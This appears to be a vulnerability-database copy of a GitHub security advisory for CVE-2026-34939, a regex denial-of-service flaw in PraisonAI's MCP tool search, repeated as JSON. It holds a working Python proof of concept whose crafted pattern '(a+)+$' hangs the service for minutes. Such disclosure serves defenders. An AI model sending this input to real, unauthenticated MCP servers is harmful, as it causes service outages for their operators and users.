GHSA-8W9J-HC3G-3G7F

Vulnerability from github – Published: 2026-04-01 23:21 – Updated: 2026-04-06 22:54
VLAI?
Summary
PraisonAI Has ReDoS via Unvalidated User-Controlled Regex in MCPToolIndex.search_tools()
Details

Summary

MCPToolIndex.search_tools() compiles a caller-supplied string directly as a Python regular expression with no validation, sanitization, or timeout. A crafted regex causes catastrophic backtracking in the re engine, blocking the Python thread for hundreds of seconds and causing a complete service outage.

Details

tool_index.py:365 (source) -> tool_index.py:368 (sink)

# source -- query taken directly from caller, no validation
def search_tools(self, query: str) -> List[ToolInfo]:
    import re

# sink -- compiled and applied with no timeout or exception handling
    pattern = re.compile(query, re.IGNORECASE)
    for tool in self.get_all_tools():
        if pattern.search(tool.name) or pattern.search(tool.hint):
            matches.append(tool)

PoC

# tested on: praisonai==1.5.87 (source install)
# install: pip install -e src/praisonai
import sys, time, json
sys.path.insert(0, 'src/praisonai')
from pathlib import Path

mcp_dir = Path.home() / '.praison' / 'mcp' / 'servers' / 'test_server'
mcp_dir.mkdir(parents=True, exist_ok=True)
(mcp_dir / '_index.json').write_text(json.dumps([
    {"name": "a" * 30 + "!", "hint": "a" * 30 + "!", "server": "test_server"}
]))
(mcp_dir / '_status.json').write_text(json.dumps({
    "server": "test_server", "available": True, "auth_required": False,
    "last_sync": time.time(), "tool_count": 1, "error": None
}))

from praisonai.mcp_server.tool_index import MCPToolIndex
index = MCPToolIndex()

start = time.monotonic()
results = index.search_tools("(a+)+$")
print(f"Returned in {time.monotonic() - start:.1f}s")
# expected output: Returned in 376.0s

Impact

A single crafted query blocks the Python thread for hundreds of seconds, causing a complete service outage for the duration. The MCP server HTTP transport runs without an API key by default, making this reachable by any attacker on the network. Repeated requests sustain the DoS indefinitely.

Severity ?
6.5 (Medium)
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H
Show details on source website
To clipboard 

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 4.5.89"
      },
      "package": {
        "ecosystem": "PyPI",
        "name": "praisonai"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "4.5.90"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-34939"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1333"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-04-01T23:21:08Z",
    "nvd_published_at": "2026-04-03T23:17:06Z",
    "severity": "MODERATE"
  },
  "details": "### Summary\n\n`MCPToolIndex.search_tools()` compiles a caller-supplied string directly as a Python regular expression with no validation, sanitization, or timeout. A crafted regex causes catastrophic backtracking in the `re` engine, blocking the Python thread for hundreds of seconds and causing a complete service outage.\n\n### Details\n\n`tool_index.py:365` (source) -\u003e `tool_index.py:368` (sink)\n```python\n# source -- query taken directly from caller, no validation\ndef search_tools(self, query: str) -\u003e List[ToolInfo]:\n    import re\n\n# sink -- compiled and applied with no timeout or exception handling\n    pattern = re.compile(query, re.IGNORECASE)\n    for tool in self.get_all_tools():\n        if pattern.search(tool.name) or pattern.search(tool.hint):\n            matches.append(tool)\n```\n\n### PoC\n```python\n# tested on: praisonai==1.5.87 (source install)\n# install: pip install -e src/praisonai\nimport sys, time, json\nsys.path.insert(0, \u0027src/praisonai\u0027)\nfrom pathlib import Path\n\nmcp_dir = Path.home() / \u0027.praison\u0027 / \u0027mcp\u0027 / \u0027servers\u0027 / \u0027test_server\u0027\nmcp_dir.mkdir(parents=True, exist_ok=True)\n(mcp_dir / \u0027_index.json\u0027).write_text(json.dumps([\n    {\"name\": \"a\" * 30 + \"!\", \"hint\": \"a\" * 30 + \"!\", \"server\": \"test_server\"}\n]))\n(mcp_dir / \u0027_status.json\u0027).write_text(json.dumps({\n    \"server\": \"test_server\", \"available\": True, \"auth_required\": False,\n    \"last_sync\": time.time(), \"tool_count\": 1, \"error\": None\n}))\n\nfrom praisonai.mcp_server.tool_index import MCPToolIndex\nindex = MCPToolIndex()\n\nstart = time.monotonic()\nresults = index.search_tools(\"(a+)+$\")\nprint(f\"Returned in {time.monotonic() - start:.1f}s\")\n# expected output: Returned in 376.0s\n```\n\n### Impact\n\nA single crafted query blocks the Python thread for hundreds of seconds, causing a complete service outage for the duration. The MCP server HTTP transport runs without an API key by default, making this reachable by any attacker on the network. Repeated requests sustain the DoS indefinitely.",
  "id": "GHSA-8w9j-hc3g-3g7f",
  "modified": "2026-04-06T22:54:16Z",
  "published": "2026-04-01T23:21:08Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-8w9j-hc3g-3g7f"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34939"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/MervinPraison/PraisonAI"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "PraisonAI Has ReDoS via Unvalidated User-Controlled Regex in MCPToolIndex.search_tools()"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.




Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.



Detection rules are retrieved from Rulezet.